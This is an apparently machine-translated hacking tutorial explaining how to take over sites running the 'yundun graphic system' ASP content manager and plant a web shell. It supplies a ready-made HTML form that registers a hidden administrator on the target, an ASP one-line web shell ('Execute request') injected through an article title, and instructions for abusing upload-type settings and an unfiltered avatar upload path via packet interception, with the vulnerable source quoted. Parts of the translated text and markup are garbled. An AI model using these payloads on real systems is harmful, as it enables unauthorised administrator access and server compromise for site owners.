Use SHELL to create a Graphic System

Author: st0p
Reprinted please indicate the source: http://www.st0p.org

In fact, the yundun graphic system is developed by the same group of people as the previous news system, so the vulnerabilities are basically the same...

How do I get the username and password?
1. The default database path is not changed. Download the database directly and get the username and password. The chance is very small.
2, through the injection to get the user name and password hash, crack the hash to restore the password, if you can not restore the case, you can refer to my previous article (boiling news system v0.45 take SHELL: http://www.bkjia.com/Article/200909/41690.html).
3rd. directly register the user as the administrator. If you open the registration page, save the following code as admin.htm, and change the URL in the action to your target site.

<Html>
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312">
<Title> </title>
<Meta name = "author" content = "st0p, st0p.org">
</Head>
 
<Body topmargin = "0">
<Form align = "center" method = "post" name = "FrmAddLink" action = "asp"> http://www.st0p.org/admin/saveuser.asp ">
<Div align = "center">
<Input name = "username" value = "st0p" type = "hidden">
<Input name = "passwd" value = "st0p.org" type = "hidden">
<Input name = "passwd2" value = "st0p.org" type = "hidden">
<Input name = "question" value = "st0p.org" type = "hidden">
<Input name = "answer" value = "st0p.org" type = "hidden">
<Input name = "fullname" value = "st0p.org" type = "hidden">
<Input name = "depid" value = "1" type = "hidden">
<Input name = "sex" value = "mr." type = "hidden">
<Input name = "birthyear" value = "1950" type = "hidden">
<Input name = "birthmonth" value = "1" type = "hidden">
<Input name = "birthday" value = "1" type = "hidden">
<Input name = "tel" value = "1234567" type = "hidden">
<Input name = "email" value = "webmaster@google.com" type = "hidden">
<Input name = "photo" value = "" type = "hidden">
<Input name = "purview" type = "hidden" value = "99999">
<Input name = "oskey" type = "hidden" value = "super">
<Input name = "reglevel" type = "hidden" value = "1">
<Input name = "jingyong" type = "hidden" value = "0">
<Input type = "submit" value = "add administrator" name = "cmdOk" class = "buttonface" style = "font-family:; font-size: 9pt;">
</P>
</Div>
</Form>
</Body>
</Html>

After the account is successfully added, log on to the background with the account: st0p password: st0p.org.

Of course, not only does the above method get the Administrator information, because we are discussing the idea of using SHELL, so we will not study how to get the Administrator information here.

How to Get SHELL?
1. save files remotely. Of course, this situation applies to iis6 and iis6 BUG. For details, refer to my previous article (boiling news system v0.45 and SHELL: the method in http://www.st0p.org/blog/archives/boiling-news-system-v0-45-take-shell.html) takes SHELL
2. log on to the background and send an article with the title

<% Execute request ("st0p") %>

The content can be written at will. After the content is published successfully, we will visit http://www.st0p.org/admin/createasp.asp, and we will prompt you that the first page has been updated to use asp! In this way, we can get a sentence ..
The address is http://www.st0p.org/lastnewsxp.asp, and the password is st0p.
3. Another method is to add the Script Type in System Management> website Properties> upload type by entering the background. We should be able to add methods such as asp, php, aspx, cer, asa, and so on. Then, when posting an article, upload the script directly. However, the following code in the program filters out asp, aspx, And asa, so the upload is successful only when CER, PHP, or other script types are supported.

FileExt = lcase (file. FileExt)
Forumupload = split (UpFileType, "| ")
For I = 0 to ubound (Forumupload)
If fileEXT = trim (Forumupload (I) then
EnableUpload = true
Exit
End if
Next
If fileEXT = "asp" or fileEXT = "asa" or fileEXT = "aspx" then
EnableUpload = false
End if
If EnableUpload = false then
Msg = "this file type cannot be uploaded! Only the following file types can be uploaded: "& UpFileType
Founderr = true
End if

4. Use the background Avatar Upload Vulnerability to intercept the NC to upload the SHELL. Because uploadfaceok. you can customize the filepath parameter in the asp file. We can modify the filepath parameter through packet capture to get the SHELL by truncation the file name, you can BAIDU your knowledge about NC upload. The code for the important part is as follows:

......
FormPath = upload. form ("filepath ")
If right (formPath, 1) <> "/" then formPath = formPath &"/"
......
FileExt = lcase (getFileExtName (file. fileName ))
 
If fileext <> "jpg" and fileext <> "png" and fileext <> "gif" and fileext <> "bmp" then
Response. write "<span style =" "font-family:; font-size: 9pt" "> This file format cannot be uploaded [<a href = # onclick = history. go (-1)> re-upload </a>] </span>"
Detected the suffix of the uploaded file name, but did not check whether the upload path is invalid.
Response. end
End if
 
Randomize
Rannum = int (90000 * rnd) + 10000
Filename = year (now) & month (now) & day (now) & hour (now) & minute (now) & second (now) & rannum & "." & fileExt
If file. FileSize> 0 then if FileSize> 0, file data exists.
File. SaveAs Server. mappath (formPath & filename) is directly inserted into formPath without filtering.
Response. write "<script> parent.doc ument. FrmAddLink. photo. value = previusfile/face/" & FileName & "</script>"
End if
......

Let's summarize this. Of course there are some other places to use. But st0p has no time to write, and there is still something to do .. If you are free, add it ..